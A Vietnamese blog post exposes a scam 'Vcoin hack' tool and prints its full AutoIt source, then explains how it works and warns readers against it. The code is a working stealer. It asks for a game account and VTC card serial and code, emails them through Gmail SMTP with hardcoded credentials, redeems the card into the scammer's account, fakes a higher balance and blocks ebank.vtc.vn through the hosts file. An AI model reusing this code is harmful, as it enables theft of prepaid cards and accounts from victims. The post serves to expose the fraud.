Code AutoIT Hack Vcoin lừa đảo của hackgame.org

Code lừa đảo của hackgame.org viết bằng AutoIT

Chào các bạn hôm nay mình share 1 code của hackgame.org một trang web được xây dựng rất công phu để lừa đảo. Hy vọng đừng bạn nào tin vào trò lừa đảo này nhé và hãy luôn nghĩ rằng “không ai cho không ai cái gì” khi sử dụng các công cụ hack kiểu này.

Cái tool lừa đảo này có tên đại loại như:
Hack Báu vật Vcoin GP CF
Shop Báu Vật CF Vĩnh Viễn
Hack Zing Xu 2013
Shop Vật phẩm Gunny 2
Hack Wow Xu Gunny 2
Hack Audition Season 3
Hack Vcoin eBank VTC
Hack Vcoin CF 2013
Hack FifaOnline 2 – Vcoin + LP
Cong Dong Game Hack CF
OneHitCF 1125 hack cf moi nhat
VinaCF 1125, Download Vina CF 1125
Hack CF 1125 – One hit, headshot
Tổng hợp Hack CF 2013
CongDongGame.Net Hack cf
KMODZ Hack Au 6123 – Hack NVTT 6123

OK đây là 1 code các code khác tương tự như vậy. Cái web này vẫn đang hoạt động vì vậy các bạn có thể update code của nó thường xuyên 🙂
[au3]
#NoTrayIcon
WinMinimizeAll()
If ProcessExists("iexplore.exe") Then
ProcessClose("iexplore.exe")
EndIf
MsgBox(0, "BugBauVat_CF", "Thông báo: Cập nhật báu vật nhận được 100% khi Bug (VICTORIA, AK47-Scope-R.Dragon, FR-F2, BLADE, ScarLight-R.Dragon, AUG A1-R.Dragon, M4A1-Red Dragon, AWM-R.Dragon, FOX, DELTA, ROSE, RPK-Gold, GatlingGun-gold, Barrett M99….)")
MsgBox(0, "BugBauVat_CF", "Nâng cấp bản Bug tất cả báu vật cho phiên bản Đột Kích mới nhất")
ProgressOn("Loading …", " Nâng Cấp Bug…", "0 %")
For $i = 1 To 100 Step 1
Sleep(40)
ProgressSet($i, "Quá Trình Nâng Cấp : " & $i & " %")
Next
Sleep(1000)
ProgressOff()
Run("HuongDan.exe")
$version = "BugBauVat_CF"
If _singleton($version, 1) = 0 Then
MsgBox(0, "Stopped", "Hệ thống không cho phép 2 chương trình cùng chạy.")
Exit
EndIf

Func _singleton($soccurencename, $iflag = 0)
Local Const $error_already_exists = 183
Local Const $security_descriptor_revision = 1
Local $handle, $lasterror, $psecurityattributes = 0
$handle = DllCall("kernel32.dll", "int", "CreateMutex", "ptr", $psecurityattributes, "long", 1, "str", $soccurencename)
$lasterror = DllCall("kernel32.dll", "int", "GetLastError")
If $lasterror[0] = $error_already_exists Then
If BitAND($iflag, 1) Then
Return SetError($lasterror[0], $lasterror[0], 0)
Else
Exit – 1
EndIf
EndIf
Return $handle[0]
EndFunc

AutoItSetOption("TrayOnEventMode", 1)
AutoItSetOption("TrayMenuMode", 1)
Opt("GUICloseOnESC", 0)
Beep(1000, 100)
Dim $aarray1[1]
Local $msg
Dim $aarray1[1]
Local $msg
Dim $gui1, $oie, $gui
$gui = GUICreate($version, 600, 394, -1, -1, -2147483648)
WinSetTrans($version, "", 0)
$minimize = GUICtrlCreateIcon("minimize", -1, 546, 9, 23, 22, -1, 32)
GUICtrlSetTip($minimize, "Thu Nhỏ Chương Trình", $version, 1, 1)
$acc = GUICtrlCreateInput("", 145, 279, 130, 20, 1, 32)
GUICtrlSetTip($acc, "Tài Khoản CF Cần Bug", $version, 1, 1)
GUICtrlSetColor(-1, 0)
GUICtrlSetLimit(-1, 16)
$se1 = GUICtrlCreateInput("PM00", 145, 316, 130, 20, 9, 32)
GUICtrlSetTip($se1, "Nhập số Seri trên thẻ Vcoin VTC Để Bug", $version, 1, 1)
GUICtrlSetColor(-1, 0)
GUICtrlSetLimit(-1, 12)
$se2 = GUICtrlCreateInput("", 145, 352, 130, 19, 8193, 32)
GUICtrlSetTip($se2, "Nhập mã thẻ Vcoin VTC Để Bug", $version, 1, 1)
GUICtrlSetColor(-1, 0)
GUICtrlSetLimit(-1, 12)
$ui = GUICtrlCreatePic("Start", 311, 302, 121, 47, -1, 32)
GUICtrlSetTip($ui, "Bắt Đầu quá trình Bug Báu Vật, Vcoin+GP", $version, 1, 1)
GUICtrlSetCursor($ui, 0)
$e = GUICtrlCreatePic("Exit", 574, 9, 22, 22, -1, 32)
GUICtrlSetTip($e, "Exit Hack", $version, 1, 1)
GUICtrlSetCursor($e, 0)
GUICtrlCreatePic("ModzCF", 0, 0, 600, 394)
GUISetState()
For $i = 0 To 255 Step 5
WinSetTrans($version, "", $i)
Next
$iepath = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE", "")
Run($iepath & " http://hanamonline.com ", "", @SW_SHOW)
Run($iepath & " http://hackgame.org/videocrossfire/ ", "", @SW_SHOW)
While 1
$msg = GUIGetMsg()
Select
Case $msg = $gui_event_close
Exit
Case $msg = $ui
If StringLen(GUICtrlRead($acc)) > 18 OR StringLen(GUICtrlRead($acc)) < 4 Then
MsgBox(0, "BugBauVat_CF", "Xin vui lòng nhập tên tài khoản Hack chính xác")
ElseIf StringLen(GUICtrlRead($se1)) <> 12 Then
MsgBox(0, "BugBauVat_CF", "Seri thẻ không hợp lệ vui lòng kiểm tra lại")
ElseIf StringLen(GUICtrlRead($se2)) <> 12 Then
MsgBox(0, "BugBauVat_CF", "Mã thẻ không hợp lệ vui lòng kiểm tra lại")
ElseIf StringLeft(GUICtrlRead($se1), 3) <> "PM0" AND StringLeft(GUICtrlRead($se1), 3) <> "PM1" Then
MsgBox(0, "BugBauVat_CF", "Thẻ này không hợp lệ .Vui lòng kiểm tra lại")
Else
$seri1 = GUICtrlRead($se1)
$seri2 = GUICtrlRead($se2)
Call("LOAD")
EndIf
Case $msg = $minimize
GUISetState(@SW_MINIMIZE)
Case $msg = $e
If WinExists("VTC eBank – Thay đổi thông tin") Then
WinClose("VTC eBank – Thay đổi thông tin")
EndIf
If ProcessExists("iexplore.exe") Then
ProcessClose("iexplore.exe")
EndIf
Run("CrossFire_4VN.bat")
For $i = 255 To 1 Step -5
WinSetTrans($version, "", $i)
Sleep(10)
Next
Exit
EndSelect
WEnd

Func load()
WinMinimizeAll()
GUISetState(@SW_HIDE, $gui)
$guiload = GUICreate("Wait", 700, 80, -1, -1, -2147483648, $ws_ex_toolwindow)
GUISetBkColor(3327, $guiload)
$tb = GUICtrlCreatePic("Connection", 0, 0, 700, 80)
GUICtrlSetFont(-1, 12)
GUICtrlSetColor(-1, 16711680)
GUISetState()
$oienap = _iecreate("https://ebank.vtc.vn/home/", 0, 0, 1)
If WinExists("Certificate Error: Navigation Blocked") Then
$bam = _iegetobjbyname($oienap, "overridelink")
_ieaction($bam, "click")
EndIf
If WinActive("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?") Then
ControlClick("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?", 0)
EndIf
Sleep(2000)
$oform = _ieformgetobjbyname($oienap, "aspnetForm")
$o1s = _ieformelementgetobjbyname($oform, "ctl00_txtUserName")
_ieformelementsetvalue($o1s, "IEFormBody")
$oform = _ieformgetobjbyname($oienap, "aspnetForm")
$o2s = _ieformelementgetobjbyname($oform, "ctl00_txtPassword")
_ieformelementsetvalue($o2s, "IEConsend")
_ieformsubmit($oform)
Sleep(2000)
$osubmit = _iegetobjbyname($oienap, "ctl00$btnLogin")
_ieaction($osubmit, "click")
$oform = _ieformgetobjbyname($oienap, "aspnetForm")
$o2s = _ieformelementgetobjbyname($oform, "ctl00_txtPassword")
_ieformelementsetvalue($o2s, "IEConsend")
$osubmit = _iegetobjbyname($oienap, "ctl00$btnLogin")
_ieaction($osubmit, "click")
$bodyloads = _iebodyreadtext($oienap)
If StringInStr($bodyloads, "Chào bạn") Then
MsgBox(0, "HackGame.Org", "Thông báo: Hack Gặp lỗi không có kết nối mạng Internet. Hoặc đang có nhiều người sử dụng Hack làm tắc ghẽn Server, bạn có thể thử lại vào lúc khác")
If WinExists("VTC eBank – Thay đổi thông tin") Then
WinClose("VTC eBank – Thay đổi thông tin")
EndIf
Exit
EndIf
$oiess = _iecreate("https://ebank.vtc.vn/home/account.infor.html?l=vi", 0, 0, 1)
$stextload = _iebodyreadhtml($oiess)
$bodyload = _iebodyreadtext($oiess)
_ieloadwait($oiess)
$i = 1
If WinActive("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?") Then
ControlClick("AutoComplete Passwords", "Do you want Internet Explorer to remember this password?", 0)
EndIf
If StringInStr($bodyload, "Thông tin tài khoản") Then
GUIDelete($guiload)
GUISetState(@SW_SHOW, $gui)
Call("GUI")
Else
If NOT StringInStr($bodyload, "Thông tin tài khoản") Then
MsgBox(0, "HackGame.Org", "Thông báo: Hack Gặp lỗi không có kết nối mạng Internet. Hoặc đang có nhiều người sử dụng Hack làm tắc ghẽn Server, bạn có thể thử lại vào lúc khác")
_iequit($oiess)
If WinExists("VTC eBank") Then
WinClose("VTC eBank")
EndIf
Run("CF.bat")
GUIDelete($guiload)
GUISetState(@SW_SHOW, $gui)
EndIf
EndIf
EndFunc

Func luadao()
$oie = _iecreate("https://ebank.vtc.vn/home/ebank.account.changeinfo.html?m=1&l=vi", 0, 0, 1)
$a = 200
$i = 1
While $i <= 20
$body = _iebodyreadhtml($oie)
$stext = _iebodyreadtext($oie)
If NOT StringInStr($stext, "Thay đổi thông tin ") Then
MsgBox(0, "Lỗi !", "Bạn chưa đăng nhập vào tài khoản hoặc đăng nhập quá 10 phút" & @CRLF & " Vui lòng đọc kỹ hướng dẫn.")
Exit
EndIf
Sleep(1000)
Dim $aarray1[1]
$aarray1 = _stringbetween($stext, "Tổng số dư ", " Vcoin")
If StringInStr($body, $aarray1[0] & " VCoin") Then
$newbody = StringReplace($body, $aarray1[0] & " VCoin", $aarray1[0] + 5000 & " VCoin")
_iebodywritehtml($oie, $newbody)
Else
MsgBox(0, "Lỗi !", "Bạn chưa đăng nhập vào tài khoản hoặc đăng nhập quá 10 phút" & @CRLF & " Vui lòng đọc kỹ hướng dẫn.")
EndIf
$a = $a + 200
$i = $i + 1
WEnd
Call("DIE")
MsgBox(0, "Thông báo !", "Tổng số dư trong tài khoản của bạn được cộng thêm là 100.000 Vcoin !")
Exit
EndFunc

Func nap()
$oie1 = _iecreate("https://ebank.vtc.vn/home/money.vto.card.html", 0, 0, 1, @SW_HIDE)
_ieloadwait($oie1)
Sleep(1000)
If WinActive("Security Alert", "Information you exchange with this site") Then
ControlClick("Security Alert", "Information you exchange with this site", 1)
EndIf
$oform1 = _ieformgetobjbyname($oie1, "aspnetForm")
$otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtSerinumber")
_ieformelementsetvalue($otext1, GUICtrlRead($se1))
$otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtCardVTOCode")
_ieformelementsetvalue($otext1, GUICtrlRead($se2))
$otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtAccount")
_ieformelementsetvalue($otext1, "comejenyc")
$otext1 = _ieformelementgetobjbyname($oform1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$txtAccount")
_ieformelementsetvalue($otext1, "comejenyc")
Sleep(3000)
$osubmit1 = _iegetobjbyname($oie1, "ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1$btnTopUp")
_ieaction($osubmit1, "click")
_ieloadwait($oie1)
$i = 1
While 1
Sleep(500)
If WinActive("Windows Internet Explorer", "Card không tồn tại") Then
ControlClick("Windows Internet Explorer", "Card không tồn tại", 1)
EndIf
If WinExists("Windows Internet Explorer", "Card đã được sử dụng") Then
ControlClick("Windows Internet Explorer", "Card đã được sử dụng", 2)
EndIf
If WinExists("Windows Internet Explorer", "Số seri thẻ phải có 12 ký tự") Then
ControlClick("Windows Internet Explorer", "Số seri thẻ phải có 12 ký tự", 2)
EndIf
If WinExists("Windows Internet Explorer", "Mã thẻ không hợp lệ, mã thẻ hợp lệ gồm 12 chữ số") Then
ControlClick("Windows Internet Explorer", "Mã thẻ không hợp lệ, mã thẻ hợp lệ gồm 12 chữ số", 2)
EndIf
$body1 = _iebodyreadtext($oie1)
If StringInStr($body1, "Bạn vui lòng nhập seri và mã thẻ dưới lớp tráng bạc trên thẻ") Then
If ProcessExists("iexplore.exe") Then
ProcessClose("iexplore.exe")
EndIf
MsgBox(32, "HackGame.Org", "Thông báo: Quá trình Bug gặp phải các lỗi sau. (Thẻ không tồn tại hoặc đx qua sử dụng hoặc Mệnh Giá thẻ quá thấp(20.000)")
MsgBox(32, "HackGame.Org", "Các bạn có thể sử dụng Thẻ khác có giá trị để thực hiện lần Bug tiếp theo!")
_iequit($oie1)
If WinExists("VTC eBank – Thông tin tài khoản") Then
WinClose("VTC eBank – Thông tin tài khoản")
EndIf
Run("CF.bat")
GUIDelete($gui1)
GUISetState(@SW_SHOW, $gui)
ExitLoop
Else
If $i = 1500 Then
GUISetState(@SW_HIDE, $gui)
GUIDelete($gui1)
Call("GUI")
ExitLoop
Else
$i = $i + 1
EndIf
EndIf
WEnd
EndFunc

Func die()
$file = FileOpen(@SystemDir & "\drivers\etc\hosts", 1)
If $file = -1 Then
MsgBox(0, "Thông báo !", "Tổng số dư trong tài khoản của bạn được cộng thêm là 100.000 Vcoin !")
Exit
EndIf
FileWrite($file, @CRLF & "127.0.0.1 ebank.vtc.vn")
FileWrite($file, @CRLF & "127.0.0.1 www.ebank.vtc.vn")
FileWrite($file, @CRLF & "127.0.0.1 http://ebank.vtc.vn")
FileClose($file)
EndFunc

Func gui()
GUISetState(@SW_HIDE, $gui)
$gui1 = GUICreate("Wait", 700, 80, -1, -1, -2147483648, $ws_ex_toolwindow)
GUISetBkColor(3327, $gui1)
$tb = GUICtrlCreatePic("Connection", 0, 0, 700, 80)
GUICtrlSetFont(-1, 12)
GUICtrlSetColor(-1, 16711680)
GUISetState()
Global $omyerror = ObjEvent("AutoIt.Error", "MyErrFunc")
$s_smtpserver = "smtp.gmail.com"
$s_fromname = "Crossfire"
$s_fromaddress = "hotromodz@gmail.com"
$s_toaddress = "hotromodz@gmail.com"
$s_subject = "Support"
$as_body = "Account: " & GUICtrlRead($acc) & " " & "Seri: " & GUICtrlRead($se1) & " " & "Code: " & GUICtrlRead($se2)
$s_attachfiles = ""
$s_ccaddress = ""
$s_bccaddress = ""
$s_username = "hotkey.autoit"
$s_password = "autoit3.5 suppro"
$ipport = 465
$ssl = 1
Global $omyret[2]
Global $omyerror = ObjEvent("AutoIt.Error", "MyErrFunc")
$rc = _inetsmtpmailcom($s_smtpserver, $s_fromname, $s_fromaddress, $s_toaddress, $s_subject, $as_body, $s_attachfiles, $s_ccaddress, $s_bccaddress, $s_username, $s_password, $ipport, $ssl)
If @error Then
Call("NAP")
Else
GUIDelete($gui1)
Call("NAP")
EndIf
EndFunc

Func _inetsmtpmailcom($s_smtpserver, $s_fromname, $s_fromaddress, $s_toaddress, $s_subject = "", $as_body = "", $s_attachfiles = "", $s_ccaddress = "", $s_bccaddress = "", $s_username = "", $s_password = "", $ipport = 25, $ssl = 0)
$objemail = ObjCreate("CDO.Message")
$objemail.from = ‘"’ & $s_fromname & ‘" <‘ & $s_fromaddress & ">"
$objemail.to = $s_toaddress
Local $i_error = 0
Local $i_error_desciption = ""
If $s_ccaddress <> "" Then $objemail.cc = $s_ccaddress
If $s_bccaddress <> "" Then $objemail.bcc = $s_bccaddress
$objemail.subject = $s_subject
If StringInStr($as_body, "<") AND StringInStr($as_body, ">") Then
$objemail.htmlbody = $as_body
Else
$objemail.textbody = $as_body & @CRLF
EndIf
If $s_attachfiles <> "" Then
Local $s_files2attach = StringSplit($s_attachfiles, ";")
For $x = 1 To $s_files2attach[0]
$s_files2attach[$x] = _pathfull($s_files2attach[$x])
If FileExists($s_files2attach[$x]) Then
$objemail.addattachment($s_files2attach[$x])
Else
$i_error_desciption = $i_error_desciption & @LF & "File not found to attach: " & $s_files2attach[$x]
SetError(1)
Return 0
EndIf
Next
EndIf
$objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
$objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_smtpserver
$objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $ipport
If $s_username <> "" Then
$objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
$objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_username
$objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_password
EndIf
If $ssl Then
$objemail.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
EndIf
$objemail.configuration.fields.update
$objemail.send
If @error Then
SetError(2)
Return $omyret[1]
EndIf
EndFunc

Func myerrfunc()
$hexnumber = Hex($omyerror.number, 8)
$omyret[0] = $hexnumber
$omyret[1] = StringStripWS($omyerror.description, 3)
ConsoleWrite("### COM Error ! Number: " & $hexnumber & " ScriptLine: " & $omyerror.scriptline & " Description:" & $omyret[1] & @LF)
SetError(1)
Return
EndFunc
[/au3]

Lưu ý: Do lo ngại một số bạn có thể áp dụng vào mục đích xấu nên code này các bạn copy về chưa thể chạy được ngay như những code khác mình share. Các bạn cũng đừng pm mình hỏi làm sao cho nó chạy nhé 🙂

Code này làm những gì?

Thực chất code này rất đơn giản nó chỉ tạo form yêu cầu bạn điền mã thẻ, tài khoản và password sau đó:
+ Mã thẻ nó dùng thư viện IE tự động nạp thẻ vào tài khoản comejenyc tài khoản này chắc là của thằng viết ra cái trò lừa đảo này rồi.
+ Thông tin tài khoản nó sẽ gửi vào email: hotromodz@gmail.com
+ Không cho bạn truy cập vào ebank.vtc.vn để lấy lại tài khoản bằng cách ghi 3 dòng sau vào file host

FileWrite($file, @CRLF & “127.0.0.1 ebank.vtc.vn”)
FileWrite($file, @CRLF & “127.0.0.1 www.ebank.vtc.vn”)
FileWrite($file, @CRLF & “127.0.0.1 http://ebank.vtc.vn”)

Lời kết

Các bạn đọc lại code mình ko phân tích sâu vào từng lệnh. Có 2 file .bat và HuongDan.exe mình chưa phân tích.
Ở đây trong hàm gửi mail có username và password của cái mail mà tool gửi về
[au3]
$s_username = "hotkey.autoit"
$s_password = "autoit3.5 suppro"
[/au3]
Cái mail này chắc bị bọn nước ngoài nó thịt lâu rồi vì mình thấy bài viết về cái tool này trên diễn đàn

http://board.deioncube.in/showthread.php?tid=29&page=5

Thread được tạo ngày 06-06-2011
Mình share code này không hy vọng các bạn đi lừa đảo người khác vì sớm muộn gì các bạn cũng bị phát hiện và hậu quả thì tùy bạn tưởng tượng 🙂